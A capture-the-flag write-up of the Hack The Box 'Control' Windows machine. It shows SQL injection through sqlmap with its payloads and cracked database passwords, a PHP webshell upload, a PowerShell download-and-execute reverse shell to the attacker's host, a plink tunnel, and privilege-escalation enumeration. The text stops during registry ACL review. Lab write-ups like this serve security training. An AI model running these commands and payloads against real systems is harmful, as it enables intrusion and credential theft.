Hack The Box Control Writeup – 10.10.10.167

Hello, I’m back with Hack The Box Control writeup for this week. The latest Control machine is Windows-based, categorized as “hard” as per HTB. The first root blood was “01 days, 05 hours, 32 mins, 55 seconds” after the release of the machine gives you hint how hard this box is. Let us start.

Enumeration – Nmap Port Scan

Like all the previous machines, I’m going to start with nmap portscan to see what are the open ports and services running.

Here is the nmap scan results:

 ⚡ ⚙  root@ns09~/htb/control nmap -sC -sV -Pn 10.10.10.167
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 12:09 +03
Nmap scan report for control.htb (10.10.10.167)
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   Kerberos, LPDString, NULL, NotesRPC, SIPOptions, SMBProgNeg: 
|_    Host '10.10.14.21' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=12/6%Time=5DEA1AE6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,
SF:"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xf
SF:fj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,4A,"F\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.14\.21'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.57 seconds
 ⚡ ⚙  root@ns09~/htb/control

The nmap portscan showed me there are 3 ports open. A port 80 – webserver, 135 – msrpc and 3306 possibly mysql server.

There is a website hosted in the default tcp port called “Fidelity”

There are 4 pages, index page, an about page, Admin page and login page. The admin and login pages did not provide any login form, but with an error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error pointing towards a misconfiguration. So I proceed to analyze the source-code.

The source-code of index.php has commented section with a message -To-do:

< !-- To Do: -- >
 Import Products
 Link to new payment system
 Enable SSL (Certificates location \192.168.4.28\myfiles) 
< !-- Header -- >

This revealed an internal IP address: 192.168.4.28d. I fire-up the burp to see if there is any requests being sent ot receives.

The Burp request also showed the request isn’t going to the webserver, but the same error comes if I request to access admin.php or login.php pages.

So, to access these either you need to have a proxy which allows you the access or simulate that you are using the proxy by adding HTTP header “X-Forwarded-For”. The Burp is useful to add such headers, so I’m going to use my already running Burp. I’m assuming that the IP 192.168.4.28 for x-forwarded-for IP (proxy) because this is the only internal IP I’ve found in the websites source-code and it actually worked.

Header X-Forwarded-For value ==>  "192.168.4.28"

As soon as I forward the request in Burp, I was able to access the admin panel (or a product page).

SQLi

So the next step was to find the SQLi in the products table. I used burp to extract search requests from the database to use exploit it using SQLMAP.

The Info:

POST /search_products.php HTTP/1.1
 Host: 10.10.10.167
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://10.10.10.167/admin.php
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 26
 x-forwarded-for: 192.168.4.28
 Connection: close
 Upgrade-Insecure-Requests: 1
 productName=D-Link+DWA-171

I saved the info as control.txt. and run the SQLMAP using this command: sqlmap –all -r control.txt –batch

 ⚡ ⚙  root@ns09~/htb/control sqlmap --all -r control.txt --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.12.1#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:03 /2019-12-07/

[14:14:03] [INFO] parsing HTTP request from 'control.txt'
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter 'productName' is dynamic
[14:14:05] [WARNING] POST parameter 'productName' does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter 'productName' might be injectable (possible DBMS: 'MySQL')
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter 'productName' might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter 'productName'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:14:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:14:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:17] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter 'productName' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="36")
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:14:20] [INFO] POST parameter 'productName' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:14:20] [INFO] testing 'MySQL inline queries'
[14:14:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:14:31] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable 
[14:14:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:14:41] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[14:14:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter 'productName' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[14:14:43] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'productName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: '10.4.8-MariaDB'
[14:14:44] [INFO] fetching current user
current user: 'manager@localhost'
[14:14:44] [INFO] fetching current database
current database: 'warehouse'
[14:14:44] [INFO] fetching server hostname
hostname: 'Fidelity'
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'

[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes 
[14:16:19] [INFO] cracked password 'l3tm3!n' for user 'manager'                                                                                                                                                                              
database management system users password hashes:                                                                                                                                                                                            
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

The SQLMAP successfully cracked the database and got me what I was looking for – usernames and passwords (in hash)

database management system users password hashes:                                                                                                                                                                                            
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

I can’t do anything with the passwords I have, I can’t log in to the system unless I upload the shell to get RCE from SQLi. So what I decided is to use Burp again to send my PHP payload to create a reverse shell inside the database system. I found several RCEs, but used this one. I modified a bit and my final payload would look like this:

After successfully upload the reverse shell, I called it back to test, it worked like a charm – immma hacker boyyy babbyy!!!

PowerCAT Reverse Shell

Now, I need a reverse connection from the Control machine. Since the machine is windows, I would go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.

Setup:

  • I download the PowerCAT.ps1 to the working directory
  • Setup the Python HTTP server: python -m SimpleHTTPServer 8081
  • A netcat listener: nclvnp 8080
  • And finally “calling it from the website” to make it work (very simple words).

The Activator:

http://10.10.10.167/nav1n.php?c=powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.21:8081/powercat.ps1');powercat -c 10.10.14.21 -p 8081 -e cmd"

ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/

As soon as I run the above caller my netcat listener got me the reverse shell:

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.167.
Ncat: Connection from 10.10.10.167:50162.
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>
C:\>cd users
cd users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C05D-877F

 Directory of C:\Users

11/05/2019  02:34 PM    <DIR>          .
11/05/2019  02:34 PM    <DIR>          ..
11/05/2019  02:34 PM    <DIR>          Administrator
11/01/2019  11:09 AM    <DIR>          Hector
10/21/2019  04:29 PM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  42,980,626,432 bytes free

C:\Users>cd Administrator
cd Administrator

Access is denied.
C:\Users>cd Hector
cd Hector

Access is denied.

I have access to the system, however, I’m not able to list the user directories. There are two users, an Administrator and Hector – I have access denied to both user directories.

Building The Tunnel: (This is a failed step, please proceed to ” White Winter Wolf webshell” Section)

I fired-up netstat -ano to see the processes running and listening.

C:\inetpub\wwwroot>netstat -ano
netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       792
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1904
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       332
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1784
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       592
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       584
  TCP    10.10.10.167:80        10.10.14.21:35928      ESTABLISHED     4
  TCP    10.10.10.167:49677     10.10.14.21:8080       ESTABLISHED     4632
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       792
  TCP    [::]:3306              [::]:0                 LISTENING       1904
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       456
  TCP    [::]:49665             [::]:0                 LISTENING       332
  TCP    [::]:49666             [::]:0                 LISTENING       948
  TCP    [::]:49667             [::]:0                 LISTENING       1784
  TCP    [::]:49668             [::]:0                 LISTENING       592
  TCP    [::]:49669             [::]:0                 LISTENING       584
  UDP    0.0.0.0:123            *:*                                    1980
  UDP    0.0.0.0:5353           *:*                                    1236
  UDP    0.0.0.0:5355           *:*                                    1236
  UDP    127.0.0.1:58934        *:*                                    948
  UDP    [::]:123               *:*                                    1980
  UDP    [::]:5353              *:*                                    1236
  UDP    [::]:5355              *:*                                    1236
C:\inetpub\wwwroot>

I found that the WinRM service is active and running (TCP [::]:5985 [::]:0 LISTENING 4). This service running locally I’m not able to access externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the windows binary in kali PuTTY PLINK to create the tunnel.

 ⚡  root@ns09~/htb/control locate plink.exe
/usr/share/windows-resources/binaries/plink.exe
 ⚡  root@ns09 ~/htb/control 

Uploading PLink.exe

Now this seems to be a hard task for me. I tried following but I have an error:

Setup Python SMBServer

⚡  root@ns09~/impacket/examples master ± python smbserver.py ROPNOP /usr/share/windows-resources/binaries/
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []

Copy PLink.exe using Command Prompt:

C:\inetpub\wwwroot\uploads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C05D-877F

 Directory of C:\inetpub\wwwroot\uploads

12/07/2019  07:00 PM    <DIR>          .
12/07/2019  07:00 PM    <DIR>          ..
11/11/2019  12:59 PM                 6 rev.php
11/11/2019  12:59 PM                 6 rev2.php
11/11/2019  12:59 PM                 6 shell.php
12/07/2019  07:00 PM    <DIR>          test
               3 File(s)             18 bytes
               3 Dir(s)  43,625,472,000 bytes free

C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

WhiteWinterWolf Webshell

So, my plan to copy PuTTY PLINK using good boy way was failed so badly that I went to sleep shutting down my laptop. In the sleep, I was told by the angels that I could use WhiteWinterWolf’s Webshell to upload my PuTTY PLINK Here is what I did:

  • I copied Webshell PHP script on to a file called “nshell.php”
  • I used the same old resources text I used to run SQLMAP in my earlier step
  • I created a new SQLMAP query to copy the script into C:\inetpub\wwwroot\uploads\

My new SQLMAP script:

sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php

After running the SQLMAP, my new shell was successfully uploaded.

⚡ ⚙  root@ns09~/htb/control sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.12.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:23:32 /2019-12-09/

[09:23:32] [INFO] parsing HTTP request from 'control2.txt'
[09:23:32] [INFO] resuming back-end DBMS 'mysql' 
[09:23:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[09:23:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
[09:23:32] [INFO] fingerprinting the back-end DBMS operating system
[09:23:33] [INFO] the back-end DBMS operating system is Windows
[09:23:34] [WARNING] potential permission problems detected ('Access denied')
[09:23:47] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want confirmation that the local file '/root/htb/control/nshell.php' has been successfully written on the back-end DBMS file system ('c:/inetpub/wwwroot/nshell.php')? [Y/n] Y
[09:24:00] [INFO] the local file '/root/htb/control/nshell.php' and the remote file 'c:/inetpub/wwwroot/nshell.php' have the same size (7188 B)
[09:24:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'

[*] ending @ 09:24:01 /2019-12-09/

 ⚡ ⚙  root@ns09~/htb/control

How to upload WhiteWinterWolf's PHP web shell
WhiteWinterWolf’s PHP web shell Upload

As soon as I have the confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed the shell:

I upload the nc.exe and PuTTY PLINK to be sure to make atleast 1 connection run properly.

Uplloading PLink.exe using WhiteWinterWolf’s PHP web shell

I’m going to run the PLink.exe first because I wanted to test if this can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunnelling. Let us try.

The tunnel was successfully created

C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.21
.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.21
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-r----------------b7:52
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
login as: navin
navin@10.10.14.21's password: ----

Linux ns09 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
navin@ns09:~$ 
PuTTY PLINK Tunnel Between Windows and Kali Machines

Note: I was not able to run PLink.exe as root, I don’t know what was the reason, the password wasn’t accepting. So I used my another called “navin“. Once the tunnel was successfully created, I use switch user to root to run my commands.

Now I can run EvilWiNRM localy on the Control machine. However, I’m still lowpreviladged user, so I need to run EvilWinRM as user Hector. if you remember in my initial SQLMAP scan it revealed 3 users’ password hashes.

hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

SQLMAP managed to get the user Manager’s password in clear text, however, our Hector’s password is still unknown, I used John to crack the password. l33———tor (sorry, I will not release the password)

Time to run EvilWinRM as Hector:

Getting User.txt

Getting Root

In order to get Root, we need to escalate the privilege of our current user, Hector. This article and this article gives a great way of windows privesc. I had to read several such articles to find the right way to become Administrator of Control machine.

Let us see what is our user Hector is capable to do?

*Evil-WinRM* PS C:\Users\Hector\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Is there any Administrator groups?

*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> 
*Evil-WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list

Currently stored credentials:

* NONE *
*Evil-WinRM* PS C:\Users\Hector\Desktop> 

So the cmdkey /list also didn’t give me any hint of stored credentials in the box. Its getting a bit hard for me at this stage.

The Windows ACL (Access Control List) is the most important command to run post-exploit. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path

The command returned with huge list of ACL of user Hector:

*Evil-WinRM* PS C:\Users\Hector\Desktop> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data 
                          BUILTIN\Users Allow  ReadKey
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
